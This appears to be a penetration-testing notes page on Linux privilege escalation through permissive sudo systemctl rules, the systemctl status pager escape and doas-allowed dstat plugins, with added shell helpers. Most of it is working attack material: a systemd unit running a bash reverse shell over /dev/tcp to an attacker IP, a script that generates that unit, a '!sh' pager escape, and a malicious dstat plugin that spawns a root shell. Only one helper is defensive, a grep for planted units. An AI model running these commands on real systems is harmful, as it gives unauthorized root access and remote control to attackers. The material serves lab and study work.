Sudo Privilege escalation
Systemctl
When a sudo rule lets a user run systemctl as root, privilege escalation is possible by modifying a unit (configuration) file that the service loads.
Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl
If we can run the "systemctl" command as root and we can also edit a unit file, we can become root by making that unit run our payload.
Case #1 Modify the configuration file
Insert a reverse-shell payload into a unit file we can write to, here /etc/systemd/system/example.service, so that the service runs it as root:
[Unit]
Description=This is an example service.
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'
[Install]
WantedBy=multi-user.target
Finally, reload systemd so it picks up the edited unit and restart the service; with a listener waiting on <local-ip>:4444 we receive a root shell:
sudo systemctl daemon-reload
sudo systemctl restart example.service
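The Case #1 procedure as a small set of shell helpers. This is an added example, not code from the original page: it lists unit files the current user can write to, generates the reverse-shell unit from the text above for a given IP and port, and adds the defender-side check (units whose ExecStart opens /dev/tcp or starts an interactive bash). The directory /etc/systemd/system and the address 10.10.14.5:4444 are assumed values.

```shell
#!/bin/sh
# Added example, not code from the original page: helpers for Case #1.
# Directory, IP and port are parameters; /etc/systemd/system and
# 10.10.14.5:4444 are assumed values, not taken from the page.

# List *.service files in a unit directory that the current user can write to.
# A writable unit file plus "sudo systemctl" is the whole precondition.
writable_units() {
    dir="${1:-/etc/systemd/system}"
    find "$dir" -maxdepth 1 -name '*.service' -writable 2>/dev/null
}

# Print a unit whose ExecStart runs a bash reverse shell as root.
# $1 = attacker IP, $2 = attacker port.
build_unit() {
    lhost="$1"
    lport="$2"
    cat <<EOF
[Unit]
Description=This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/${lhost}/${lport} 0>&1'

[Install]
WantedBy=multi-user.target
EOF
}

# Defender-side check: list units whose ExecStart opens /dev/tcp or starts an
# interactive bash, the signature of the payload above.
suspicious_units() {
    dir="${1:-/etc/systemd/system}"
    grep -lE '^ExecStart=.*(/dev/tcp/|bash -i)' "$dir"/*.service 2>/dev/null
}

# Usage on the target (listener already running on the attacker side):
#   writable_units                                   # pick a unit we can edit
#   build_unit 10.10.14.5 4444 > /etc/systemd/system/example.service
#   sudo systemctl daemon-reload && sudo systemctl restart example.service
```

Run writable_units first: if it prints nothing, there is no unit to hijack and Case #1 does not apply, however permissive the sudo rule is. The suspicious_units check is what a blue team can run over /etc/systemd/system to spot a unit planted this way.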
Case #2 systemctl permissions to see the status
Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl status example.service
If we can execute "systemctl status" as root, systemctl pipes its output through a pager (less by default), and from the less prompt we can spawn a shell with !sh, which inherits root. The pager only appears when the output does not fit the terminal, so a short status may need a smaller terminal window. Since systemd 247 the pager is started with LESSSECURE=1 when the caller is not the owner of the login session (the sudo case), which disables the ! command; earlier versions do not do this (CVE-2023-26604), so check "systemctl --version" first.
sudo systemctl status example.service
!sh
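Triage helpers for both systemctl cases, added here as an example and not code from the original page. The first reads captured "sudo -l" output and says whether the rule is the unrestricted form from Case #1 or the "systemctl status" form from Case #2; the second reads "systemctl --version" and applies the 247 cut-off described above. The sample output strings used in the comments and tests are constructed.

```shell
#!/bin/sh
# Added example, not code from the original page: triage for the two
# systemctl cases. Both helpers read captured command output on stdin so
# they can be run offline; the sample strings in the comments are constructed.

# Classify "sudo -l" output. Prints "full" when systemctl may be run with any
# arguments (Case #1), "status" when only "systemctl status ..." is allowed
# (Case #2), "none" otherwise. Only the rule forms shown on this page are
# recognised; sudoers wildcards and command aliases are not parsed.
classify_sudo_rules() {
    rules=$(cat)
    if printf '%s\n' "$rules" | grep -Eq '^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:[[:space:]]*)?(/usr/bin/|/bin/)?systemctl[[:space:]]*$'; then
        echo full
    elif printf '%s\n' "$rules" | grep -Eq '(/usr/bin/|/bin/)?systemctl[[:space:]]+status'; then
        echo status
    else
        echo none
    fi
}

# Decide whether "!sh" at the less prompt can work. systemd 247 and later
# start the pager with LESSSECURE=1 when the caller is not the owner of the
# login session (the sudo case), which disables "!"; earlier versions do not
# (CVE-2023-26604). Reads the first line of "systemctl --version",
# e.g. "systemd 245 (245.4-4ubuntu3)". Prints "yes" or "no".
pager_escape_likely() {
    ver=$(head -n 1 | sed -n 's/^systemd \([0-9][0-9]*\).*/\1/p')
    if [ -n "$ver" ] && [ "$ver" -lt 247 ]; then
        echo yes
    else
        echo no
    fi
}

# Usage on the target:
#   sudo -l 2>/dev/null | classify_sudo_rules
#   systemctl --version | pager_escape_likely
```

A "no" from pager_escape_likely does not make the rule harmless, only the pager trick; a restricted "systemctl status" rule on a current systemd is still worth recording in the report.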
Doas
doas is an alternative to sudo typically found on OpenBSD, but it can also be installed on Debian-based Linux distributions such as Ubuntu. Its rules live in doas.conf; a rule of the form "permit nopass <user> as root cmd /usr/bin/dstat" lets that user run dstat as root. dstat loads any plugin file named dstat_<name>.py from its plugin directories when invoked with --<name>, so a writable plugin directory turns that rule into a root shell.
#Find doas configuration file
Intrusionz3r0@kali:~$ find / -name doas.conf 2>/dev/null
#Write malicious plugin (the plugin directory must be writable by us)
Intrusionz3r0@kali:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_Intrusionz3r0.py
#Execute dstat through doas; loading the plugin runs our code as root
doas /usr/bin/dstat --Intrusionz3r0
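The doas enumeration and plugin drop as shell helpers. This is an added example, not code from the original page: it extracts from doas.conf the permit rules that apply to a given user and groups, lists writable dstat plugin directories, and writes the plugin from the commands above. The doas.conf sample used in the test is constructed, and dstat's default plugin search directories (~/.dstat, /usr/share/dstat, /usr/local/share/dstat) are assumed from dstat's documentation rather than taken from this page.

```shell
#!/bin/sh
# Added example, not code from the original page: doas triage helpers.
# doas.conf rules look like "permit nopass bob as root cmd /usr/bin/dstat";
# the sample config used in testing is constructed. dstat's default plugin
# search directories are assumed from its documentation, not from this page.

# Print "<target> <command>" for every permit rule in doas.conf (stdin) that
# names user $1 or one of the groups in $2 (space-separated, as printed by
# "id -Gn"). Rules without "cmd" allow any command and are printed as ANY;
# rules without "as" default to root. doas applies the LAST matching rule,
# so a later deny line can still override what is listed here.
doas_rules_for() {
    awk -v u="$1" -v g="$2" '
    BEGIN { n = split(g, arr, " "); for (k = 1; k <= n; k++) groups[arr[k]] = 1 }
    $1 == "permit" {
        i = 2
        # skip option keywords; setenv takes a brace-delimited list
        while (i <= NF && ($i == "nopass" || $i == "persist" || $i == "keepenv" || $i == "setenv")) {
            if ($i == "setenv") { while (i <= NF && index($i, "}") == 0) i++ }
            i++
        }
        ident = $i
        if (substr(ident, 1, 1) == ":") { if (!(substr(ident, 2) in groups)) next }
        else if (ident != u) next
        target = "root"; cmd = "ANY"
        for (j = i + 1; j <= NF; j++) {
            if ($j == "as")  target = $(j + 1)
            if ($j == "cmd") cmd = $(j + 1)
        }
        print target, cmd
    }'
}

# Print the dstat plugin directories we can write to. Defaults are dstat's
# search path (assumed); override by passing directories as arguments.
writable_dstat_dirs() {
    if [ $# -eq 0 ]; then
        set -- "$HOME/.dstat" /usr/share/dstat /usr/local/share/dstat
    fi
    for d in "$@"; do
        if [ -d "$d" ] && [ -w "$d" ]; then echo "$d"; fi
    done
    return 0
}

# Drop a plugin into $1 named dstat_$2.py; dstat executes it when run
# with --$2, so "doas /usr/bin/dstat --$2" yields a root shell.
write_dstat_plugin() {
    printf 'import os\n\nos.system("/bin/bash")\n' > "$1/dstat_$2.py"
}

# Usage on the target:
#   doas_rules_for "$(id -un)" "$(id -Gn)" < /etc/doas.conf
#   dir=$(writable_dstat_dirs | head -n 1)
#   write_dstat_plugin "$dir" Intrusionz3r0 && doas /usr/bin/dstat --Intrusionz3r0
```

If doas_rules_for prints "root ANY" the plugin step is unnecessary, since doas already grants an unrestricted root command; the dstat route is for the narrower "cmd /usr/bin/dstat" rule.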